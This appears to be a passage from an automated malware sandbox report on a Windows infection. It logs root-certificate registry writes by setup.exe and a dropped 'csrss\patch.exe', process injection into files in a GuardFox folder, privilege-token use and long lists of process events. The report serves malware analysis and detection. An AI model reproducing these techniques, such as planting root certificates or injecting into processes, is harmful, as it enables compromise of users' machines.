c4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
